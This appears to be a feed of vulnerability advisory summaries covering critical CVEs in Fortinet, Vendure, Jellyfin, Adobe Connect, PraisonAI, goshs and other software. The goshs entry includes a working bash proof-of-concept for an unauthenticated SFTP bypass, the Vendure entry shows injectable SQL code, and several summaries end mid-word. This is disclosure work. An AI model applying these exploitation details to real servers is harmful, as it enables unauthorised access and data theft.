OS command injection in Fortinet FortiSandbox 4.4.0-4.4.8 and FortiSandbox PaaS versions 21.3-23.4 enables remote unauthenticated attackers to execute arbitrary system commands with complete system compromise. CVSS 9.8 (network, low complexity, no privileges) but EPSS 0.29% (53rd percentile) suggests limited real-world exploitation observed despite maximum severity score. No active exploitation confirmed (not in CISA KEV). SSVC framework classifies as automatable with total technical impact but no known exploitation. Fortinet PSIRT advisory FG-IR-26-100 available but description incomplete (missing attack vector specifics).
Path traversal in Fortinet FortiSandbox 4.4.0-4.4.8 and 5.0.0-5.0.5 enables remote unauthenticated attackers to achieve full system compromise. With CVSS 9.8 (AV:N/AC:L/PR:N/UI:N), the vulnerability permits network-based exploitation without credentials or user interaction, leading to complete confidentiality, integrity, and availability impact. Despite critical severity, EPSS score of 0.06% (18th percentile) indicates low observed exploitation probability. No active exploitation confirmed (not in CISA KEV). SSVC framework marks it as automatable with total technical impact but no current exploitation. The incomplete CVE description (placeholder text for attack vector) suggests early disclosure; verify completeness with Fortinet advisory FG-IR-26-112.
## Summary An unauthenticated SQL injection vulnerability exists in the Vendure Shop API. A user-controlled query string parameter is interpolated directly into a raw SQL expression without parameterization or validation, allowing an attacker to execute arbitrary SQL against the database. This affects all supported database backends (PostgreSQL, MySQL/MariaDB, SQLite). The Admin API is also affected, though exploitation there requires authentication. ## Affected versions - `@vendure/core` < 2.3.4 - `@vendure/core` >= 3.0.0, < 3.5.7 - `@vendure/core` >= 3.6.0, < 3.6.2 Note: versions 2.3.4 and above in the 2.x line are patched. There were no 2.4.x or 2.x releases between 2.3.x and 3.0.0. ## Patched versions - `@vendure/core` 2.3.4 - `@vendure/core` 3.5.7 - `@vendure/core` 3.6.2 ## Details In `ProductService.findOneBySlug`, the request context's `languageCode` value is interpolated into a SQL `CASE` expression via a JavaScript template literal: ```ts .addSelect( `CASE translation.languageCode WHEN '${ctx.languageCode}' THEN 2 WHEN '${ctx.channel.defaultLanguageCode}' THEN 1 ELSE 0 END`, 'sort_order', ) ``` TypeORM has no opportunity to parameterize this value because it is embedded directly into the SQL string before being passed to the query builder. The `languageCode` value can originate from the HTTP query string and is set on the request context for every incoming API request. The value is cast to the `LanguageCode` TypeScript type at compile time, but no runtime validation is performed -- the raw query string value is used as-is. ## Attack vector An unauthenticated attacker can append a crafted `languageCode` query parameter to any Shop API request to inject arbitrary SQL into the query. No user interaction is required. The vulnerable endpoint is exposed on every default Vendure installation. ## Mitigation **Upgrade to a patched version immediately.** If you cannot upgrade right away, apply the following hotfix to `RequestContextService.getLanguageCode` to validate the `languageCode` input at the boundary. This blocks injection payloads before they can reach any query: ```ts private getLanguageCode(req: Request, channel: Channel): LanguageCode | undefined { const queryLanguageCode = req.query?.languageCode as string | undefined; const isValidFormat = queryLanguageCode && /^[a-zA-Z0-9_-]+$/.test(queryLanguageCode); return ( (isValidFormat ? (queryLanguageCode as LanguageCode) : undefined) ?? channel.defaultLanguageCode ?? this.configService.defaultLanguageCode ); } ``` This replaces the existing `getLanguageCode` method in `packages/core/src/service/helpers/request-context/request-context.service.ts`. Invalid values are silently dropped and the channel's default language is used instead. The patched versions additionally convert the vulnerable SQL interpolation to a parameterized query as defense in depth.
Remote code execution as root in Jellyfin media server versions prior to 10.11.7 allows authenticated users with 'Upload Subtitles' permission to execute arbitrary code through a multi-stage attack chain exploiting path traversal in subtitle uploads, arbitrary file write, and ld.so.preload manipulation. CVSS 9.9 (Critical) reflects the complete system compromise potential. EPSS data not available. Not listed in CISA KEV, indicating no confirmed active exploitation at time of analysis. Attack requires low-privilege authenticated access but can escalate to full root-level code execution.
Remote code execution as root in OpenRemote IoT platform's rules engine (versions prior to 1.20.3) allows authenticated non-superuser attackers with write:rules role to execute arbitrary Java code via unsandboxed JavaScript rulesets. The vulnerability stems from Nashorn ScriptEngine.eval() executing user-supplied JavaScript without ClassFilter restrictions, enabling Java.type() access to any JVM class including java.lang.Runtime. Attackers can compromise the entire multi-tenant platform, steal c
Remote code execution in Webkul Krayin CRM v2.2.x allows authenticated attackers with low-level privileges to upload and execute malicious PHP files through an unrestricted file upload vulnerability in the /admin/tinymce/upload endpoint. The scope change (CVSS S:C) indicates potential container escape or cross-tenant impact. Authentication requirement confirmed (CVSS PR:L). No public exploit identified at time of analysis, though technical details are available in security advisory references.
SQL injection in SAP Business Planning and Consolidation (BPC) and SAP Business Warehouse (BW) allows authenticated users to execute arbitrary SQL commands against the database. Affected versions span SAP_BW 750-758, BPC4HANA 300, and HANABPC 810/816. The scope-change vector (S:C) indicates attackers can pivot beyond the vulnerable component to compromise database resources serving multiple SAP applications. Despite critical CVSS 9.9 severity, EPSS exploitation probability remains low (0.05%, 14th percentile) with CISA SSVC indicating no current exploitation and non-automatable attack profile. SAP security note 3719353 provides remediation guidance.
Remote code execution in Adobe Connect 12.10 and earlier (including 2025.3) allows unauthenticated attackers to execute arbitrary code by exploiting unsafe deserialization. Attack requires no user interaction despite UI:R in CVSS vector, with scope change enabling container escape or privilege escalation beyond the application context. Adobe released patch APSB26-37. EPSS score of 1.50% (81st percentile) indicates moderate exploitation probability. No active exploitation confirmed (SSVC: exploitation=none), but deserialization flaws are commonly targeted once details emerge.
Unauthenticated remote code execution via JMX monitoring port affects Talend JobServer and Talend Runtime (CVSS 9.8). Attackers can exploit the exposed JMX interface without authentication to execute arbitrary code with JobServer privileges. Vendor-released patches available (Talend ESB Runtime R2024-07-RT). No confirmed active exploitation (CISA KEV status: NO), but the trivial attack complexity (AC:L) and network accessibility (AV:N) present significant risk for exposed instances. EPSS data not provided.
An issue in Hostbill v.2025-11-24 and 2025-12-01 allows a remote attacker to execute arbitrary code and escalate privileges via the CSV registration field
Remote code execution in Windows IKE Extension (Internet Key Exchange) via double free memory corruption allows unauthenticated network attackers to execute arbitrary code on Windows 10 (1607-22H2), Windows 11 (22H3-26H1), and Windows Server (2016-2025). CVSS 9.8 critical severity with network vector requiring no authentication or user interaction. Vendor patch released by Microsoft addresses CWE-415 double free weakness. EPSS score of 0.07% (21st percentile) suggests low observed exploitation probability despite critical severity rating, indicating this may be a targeted or difficult-to-exploit vulnerability in production environments. No CISA KEV listing or public POC identified at time of analysis.
Arbitrary command and code execution in PraisonAI's workflow engine (versions <4.5.139) and praisonaiagents (<1.5.140) allows remote unauthenticated attackers to execute shell commands and Python code through malicious YAML workflow files. The vulnerability stems from unsafe processing of 'run:', 'script:', and 'python:' directives in job-type workflows without validation or sandboxing. With a critical CVSS score of 9.8 and network-accessible attack vector requiring no privileges or user interac
### Summary goshs contains an SFTP authentication bypass when the documented empty-username basic-auth syntax is used. If the server is started with `-b ':pass'` together with `-sftp`, goshs accepts that configuration but does not install any SFTP password handler. As a result, an unauthenticated network attacker can connect to the SFTP service and access files without a password. I reproduced this on the latest release `v2.0.0-beta.5`. ### Details The help text explicitly documents empty usernames as valid authentication input: - `options/options.go:264-266` says `Use basic authentication (user:pass - user can be empty)` The SFTP sanity check only requires that either `-b` or `--sftp-keyfile` is present: ```go if opts.SFTP && (opts.BasicAuth == "" && opts.SFTPKeyFile == "") { logger.Fatal("When using SFTP you need to either specify an authorized keyfile using -sfk or username and password using -b") } ``` That parsing logic then splits `-b ':pass'` into an empty username and a non-empty password: ```go auth := strings.SplitN(opts.BasicAuth, ":", 2) opts.Username = auth[0] opts.Password = auth[1] ``` But the SFTP server only installs a password handler if both the username and password are non-empty: ```go if s.Username != "" && s.Password != "" { sshServer.PasswordHandler = func(ctx ssh.Context, password string) bool { return ctx.User() == s.Username && password == s.Password } } ``` With `-b ':pass'`, that condition is false, so no password authentication is enforced for SFTP sessions. Relevant source locations: - `options/options.go:264-266` - `sanity/checks.go:82-85` - `sanity/checks.go:102-109` - `sftpserver/sftpserver.go:82-85` ### PoC I manually verified the issue on `v2.0.0-beta.5`. The server was started with the documented empty-user auth syntax `-b ':pass'`, but an SFTP client still downloaded a file without supplying any key or password. Manual verification commands used: `Terminal 1` ```bash cd '/Users/r1zzg0d/Documents/CVE hunting/targets/goshs_beta5' go build -o /tmp/goshs_beta5 ./ rm -rf /tmp/goshs_authless_root /tmp/authless_sftp.txt mkdir -p /tmp/goshs_authless_root printf 'root file\n' > /tmp/goshs_authless_root/test.txt /tmp/goshs_beta5 -p 18102 -sftp -d /tmp/goshs_authless_root --sftp-port 2223 -b ':pass' ``` `Terminal 2` ```bash printf 'get /tmp/goshs_authless_root/test.txt /tmp/authless_sftp.txt\nbye\n' | \ sftp -o PreferredAuthentications=none,password -o PubkeyAuthentication=no \ -o StrictHostKeyChecking=no -o UserKnownHostsFile=/dev/null -P 2223 -b - foo@127.0.0.1 cat /tmp/authless_sftp.txt ``` Expected result: - the SFTP session succeeds without a key - there is no password prompt - `cat /tmp/authless_sftp.txt` prints `root file` PoC Video 1: https://github.com/user-attachments/assets/1ef1539d-bf29-419b-a26e-46aa405effb4 Single-script verification: ```bash '/Users/r1zzg0d/Documents/CVE hunting/output/poc/gosh_poc2' ``` `gosh_poc2` script content: ```bash #!/usr/bin/env bash set -euo pipefail REPO='/Users/r1zzg0d/Documents/CVE hunting/targets/goshs_beta5' BIN='/tmp/goshs_beta5_sftp_empty_user' ROOT='/tmp/goshs_authless_root' DOWNLOAD='/tmp/authless_sftp.txt' HTTP_PORT='18102' SFTP_PORT='2223' SERVER_PID="" cleanup() { if [[ -n "${SERVER_PID:-}" ]]; then kill "${SERVER_PID}" >/dev/null 2>&1 || true wait "${SERVER_PID}" 2>/dev/null || true fi } trap cleanup EXIT echo '[1/5] Building goshs beta.5' cd "${REPO}" go build -o "${BIN}" ./ echo '[2/5] Preparing test root' rm -rf "${ROOT}" "${DOWNLOAD}" mkdir -p "${ROOT}" printf 'root file\n' > "${ROOT}/test.txt" echo "[3/5] Starting goshs with documented empty-user auth syntax on SFTP ${SFTP_PORT}" "${BIN}" -p "${HTTP_PORT}" -sftp -d "${ROOT}" --sftp-port "${SFTP_PORT}" -b ':pass' \ >/tmp/gosh_poc2.log 2>&1 & SERVER_PID=$! for _ in $(seq 1 40); do if python3 - <<PY import socket s = socket.socket() try: s.connect(("127.0.0.1", ${SFTP_PORT})) raise SystemExit(0) except OSError: raise SystemExit(1) finally: s.close() PY then break fi sleep 0.25 done echo '[4/5] Connecting without password or key' printf "get ${ROOT}/test.txt ${DOWNLOAD}\nbye\n" | \ sftp -o PreferredAuthentications=none,password -o PubkeyAuthentication=no \ -o StrictHostKeyChecking=no -o UserKnownHostsFile=/dev/null -P "${SFTP_PORT}" -b - foo@127.0.0.1 echo '[5/5] Verifying unauthenticated file access' echo "Downloaded content: $(cat "${DOWNLOAD}")" if [[ "$(cat "${DOWNLOAD}")" == 'root file' ]]; then echo '[RESULT] VULNERABLE: empty-user SFTP password auth leaves the server unauthenticated' else echo '[RESULT] NOT REPRODUCED' exit 1 fi ``` PoC Video 2: https://github.com/user-attachments/assets/b8f632b7-20f4-49f1-b207-b2502af49b77 ### Impact This is an authentication bypass in the SFTP service. An external attacker does not need valid credentials to access the exposed SFTP root when the operator follows the documented `-b ':pass'` syntax. That enables unauthenticated reading, uploading, renaming, and deleting of files within the configured SFTP root, depending on server mode and filesystem permissions. ### Remediation Suggested fixes: 1. Install the SFTP password handler whenever a password is configured, even if the username is an empty string. 2. If empty usernames are not intended for SFTP, reject `-b ':pass'` during option validation whenever `-sftp` is enabled. 3. Add an integration test that starts SFTP with `-b ':pass'` and verifies that unauthenticated sessions are rejected.
Time-based blind SQL injection in manikandan580 School Management System 1.0 allows unauthenticated remote attackers to extract sensitive database contents and potentially execute arbitrary SQL commands through the fromdate POST parameter in /studentms/admin/between-date-reprtsdetails.php. The CVSS 9.8 critical score reflects network-based exploitation requiring no privileges or user interaction, with complete confidentiality, integrity, and availability impact. No public exploit identified at time of analysis, though the specific vulnerable parameter and injection type are documented in public security advisories.
SQL injection in Grocery Store Management System 1.0 allows unauthenticated remote attackers to execute arbitrary SQL commands through the sitem_name parameter in search_products_itname.php. The vulnerability achieves maximum CVSS 9.8 due to network accessibility without authentication, enabling complete database compromise including data exfiltration, modification, and potential system takeover. EPSS data not available; no confirmed active exploitation (CISA KEV) identified at time of analysis, though publicly available exploit code exists per researcher advisory.
A SQL injection vulnerability exists in the School Management System (version 1.0) by manikandan580. An unauthenticated or authenticated remote attacker can supply a crafted HTTP request to the affected endpoint to manipulate SQL query logic and extract sensitive database information.
A vulnerability was identified in OpenAI Codex CLI v0.23.0 and before that enables code execution through malicious MCP (Model Context Protocol) configuration files. The attack is triggered when a user runs the codex command inside a malicious or compromised repository. Codex automatically loads project-local .env and .codex/config.toml files without requiring user confirmation, allowing attackers to embed arbitrary commands that execute immediately.
An issue pertaining to CWE-843: Access of Resource Using Incompatible Type was discovered in transloadit uppy v0.25.6.
Cross-package metadata injection in NuGet Gallery backend allows authenticated attackers to achieve remote code execution and arbitrary blob storage writes through crafted .nuspec files. Attackers exploit URI fragment injection via unsanitized package identifiers to control blob paths in the storage container, enabling tampering of existing content beyond .nupkg files. CVSS 9.6 (Critical) with network attack vector, low complexity, and scope change. Vendor-released patch available in commit 0e80f87628349207cdcaf55358491f8a6f1ca276. No public exploit identified at time of analysis.
Remote code execution in Adobe Connect 12.10 and earlier allows unauthenticated network attackers to execute arbitrary code via deserialization of untrusted data. The vulnerability has changed scope (CVSS 9.3), enabling impact beyond the vulnerable component. Adobe issued patch APSB26-37. EPSS indicates 81st percentile risk with 1.44% probability, and CISA SSVC reports no active exploitation. The CVSS vector conflicts with the description: vector indicates user interaction required (UI:R) while description states 'does not require user interaction' - verify actual interaction requirements with Adobe advisory.
Arbitrary file read via ffmpeg argument injection in Jellyfin media server versions before 10.11.7 allows unauthenticated remote attackers to exfiltrate sensitive server files (including /etc/shadow) through malicious StreamOptions query parameters. The vulnerability bypasses input validation by exploiting the ParseStreamOptions method, which concatenates unsanitized lowercase query parameters directly into ffmpeg command lines, enabling drawtext filter injection to render file contents in video streams. CVSS 9.3 (Critical) with network attack vector and no authentication required. No public exploit identified at time of analysis, though the technical details in the advisory provide a clear exploitation path.
DOM-based XSS in Adobe Connect 12.10 and earlier (including 2025.3) enables malicious JavaScript execution in victim browsers when users visit attacker-crafted webpages. The changed scope in CVSS vector (S:C) indicates the vulnerability can affect resources beyond the vulnerable component's security authority, potentially allowing lateral access to other Connect features or sessions. Adobe has released a patch in APSB26-37. EPSS exploitation probability is low (0.10%, 27th percentile) with no confirmed active exploitation (not in CISA KEV), suggesting this is currently a theoretical risk rather than an imminent mass-exploitation threat.
Reflected XSS in Adobe Connect 12.10 and earlier enables attackers to execute malicious JavaScript in victim browsers through crafted URLs. The changed scope (S:C) indicates potential escape from Adobe Connect's application context to access other origins, elevating impact beyond typical reflected XSS. CVSS 9.3 reflects high confidentiality/integrity impact with scope change, though real-world exploitation requires social engineering (UI:R). EPSS score of 0.10% (27th percentile) and SSVC classification of non-automatable with no observed exploitation suggest this is lower priority than CVSS alone indicates, despite the high numerical score.
Reflected XSS in Adobe Connect versions 12.10 and earlier enables attackers to execute malicious JavaScript in victim browsers through crafted URLs. The changed scope (S:C) in the CVSS vector indicates the vulnerability can affect resources beyond the vulnerable component, elevating the severity to 9.3 despite being 'just' XSS. Requires user interaction (clicking malicious link) but no authentication. EPSS score of 0.10% (27th percentile) suggests low probability of mass exploitation. CISA SSVC framework rates this as non-automatable with total technical impact but no observed exploitation, indicating priority for patch deployment in internet-facing Adobe Connect deployments but not emergency response level.
Remote code execution in Adobe ColdFusion 2023.18, 2025.6 and earlier allows unauthenticated adjacent network attackers to execute arbitrary code via improper input validation. The vulnerability requires no user interaction and achieves scope change, enabling attackers to break out of security boundaries. CVSS 9.3 (Critical). No confirmed active exploitation or public POC identified at time of analysis, but the combination of zero authentication requirements and code execution impact makes this a high-priority patching target for ColdFusion deployments.
Sandbox escape in Terrarium enables arbitrary code execution with root privileges on the host system through JavaScript prototype chain traversal. This local attack requires no authentication or user interaction and breaks out of the sandbox entirely (scope change from container to host). CERT/CC publicly disclosed the vulnerability (VU#414811). EPSS probability is very low at 0.02% (5th percentile), and CISA SSVC indicates no active exploitation detected. Despite the critical 9.3 CVSS score, real-world risk appears limited by local attack vector and absence of widespread targeting, though the total technical impact (root-level host compromise) makes this severe for any deployment running untrusted code in Terrarium sandboxes.
Authentication bypass in OAuth2 Proxy versions before 7.15.2 allows remote unauthenticated attackers to access protected resources when deployed with nginx auth_request integration and health check features enabled. Attackers can spoof health check User-Agent headers to bypass OAuth2 authentication entirely, gaining unauthorized access to upstream applications. CVSS 9.1 (Critical) reflects network-accessible, low-complexity attack requiring no privileges or user interaction. No active exploitation confirmed (not in CISA KEV), but the trivial attack complexity and authentication bypass impact warrant immediate patching in affected deployments using nginx auth_request with --ping-user-agent or --gcp-healthchecks flags.
Unauthenticated remote session hijacking in PraisonAI's browser bridge (versions <4.5.139) and praisonaiagents (<1.5.140) allows network attackers to control browser automation sessions without authentication. The /ws WebSocket endpoint accepts connections from any client omitting the Origin header, enabling attackers to send start_session commands that hijack idle browser-extension sessions and receive all automation outputs. With CVSS 9.1 (Critical) scoring driven by network attack vector, low complexity, and no authentication requirement (AV:N/AC:L/PR:N), this represents a severe risk in any deployment where the default 0.0.0.0 binding exposes the service to untrusted networks. No public exploit identified at time of analysis, though exploitation requires only basic WebSocket client capabilities.
Unauthenticated data deletion in LearnPress WordPress LMS plugin (versions ≤4.3.2.8) allows remote attackers to delete arbitrary quiz answer options without authentication. The plugin exposes wp_rest nonces to unauthenticated visitors in public frontend HTML and uses this nonce as the sole security gate for its AJAX dispatcher, while the delete_question_answer() function lacks both capability and ownership verification. With CVSS 9.1 (Critical) scoring and network-exploitable attack vector requi
HTTP request smuggling in Eclipse Jetty's HTTP/1.1 parser lets remote unauthenticated attackers desynchronize front-end/back-end request boundaries by abusing quoted-string chunk extensions. Jetty incorrectly terminates chunk-extension parsing at a CRLF located inside an unterminated quoted-string (e.g. `1;a="`) rather than rejecting it, so attacker-controlled bytes are reinterpreted as a second, smuggled request on the same TCP connection. Publicly available exploit code exists (a working Python PoC ships in the GHSA advisory), though EPSS is very low (0.03%, 9th percentile) and the issue is not on CISA KEV.
Header injection vulnerability in Apache APISIX. The attacker can take advantage of certain configuration in forward-auth plugin to inject malicious headers. This issue affects Apache APISIX: from 2.12.0 through 3.15.0. Users are recommended to upgrade to version 3.16.0, which fixes the issue.
GitHub Actions credential leakage in PraisonAI through ArtiPACKED attack exposes GITHUB_TOKEN and ACTIONS_RUNTIME_TOKEN in workflow artifacts. Versions 4.5.139 and below persist credentials in .git/config via actions/checkout without disabling persist-credentials, allowing any user with read access to public repository artifacts to extract tokens and compromise the supply chain. CVSS 9.1 (Critical) with network-accessible, unauthenticated attack vector. EPSS data not provided; no confirmed active exploitation (KEV status not indicated), but attack technique is publicly documented by Palo Alto Unit42 and widely reported. Vendor-released patch available in version 4.5.140.
Progress OpenEdge 12.2.0-12.2.18 and 12.8.0-12.8.9 expose stored passwords and secrets to decryption through cryptographically weak OECH1 prefix encoding. Remote unauthenticated attackers can exploit this weakness to recover obfuscated credentials and sensitive data (CVSS 9.1, VC:H/VI:H). No public exploit identified at time of analysis, but the vulnerability is automatable with total technical impact per SSVC framework, making credential harvesting straightforward once encoding is accessed.
Escape sequence injection in Microsoft Power Apps versions prior to 3.26032.10.0 allows authenticated attackers with low privileges to bypass security controls and achieve remote code execution with high confidentiality, integrity, and availability impact across security boundaries. The vulnerability requires user interaction and affects Power Apps 1710 (build 9.2.23071.136 and earlier). EPSS score of 0.08% (23rd percentile) suggests low probability of mass exploitation despite critical CVSS 9.0 rating. Vendor patch available via Microsoft Security Response Center advisory.
Argument injection in upKeeper Instant Privilege Access through version 1.5.0 enables remote authenticated attackers to hijack privileged execution threads via manipulated command delimiters. The network-accessible attack vector combined with high confidentiality, integrity, and availability impacts across both vulnerable and subsequent systems creates critical risk for privilege escalation scenarios. EPSS data not available; no confirmed active exploitation (CISA KEV) or public exploit code identified at time of analysis, though vendor self-disclosure suggests potential for targeted abuse.